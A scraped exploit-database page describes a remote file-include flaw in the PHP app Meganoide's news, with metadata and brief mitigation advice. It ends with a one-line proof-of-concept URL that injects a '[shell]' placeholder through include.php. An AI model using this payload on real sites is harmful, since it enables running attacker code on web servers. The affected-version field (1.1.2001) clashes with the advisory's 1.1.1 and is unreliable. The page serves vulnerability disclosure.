Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote File Include Vulnerability in Meganoide's news - exploit.company
header-logo
Suggest Exploit
vendor:
Meganoide's news
by:
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Meganoide's news
Affected Version From: 1.1.2001
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Include Vulnerability in Meganoide’s news

The Meganoide's news application is vulnerable to a remote file-include vulnerability due to inadequate sanitization of user-supplied input. An attacker can exploit this vulnerability to execute arbitrary PHP code within the context of the webserver process.

Mitigation:

To mitigate this vulnerability, the developer should ensure that user-supplied input is properly sanitized and validated before including files. Additionally, it is recommended to implement strong input validation and apply the principle of least privilege when handling user input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22589/info

Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.

This issue affects version 1.1.1; other versions may also be affected. 

http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]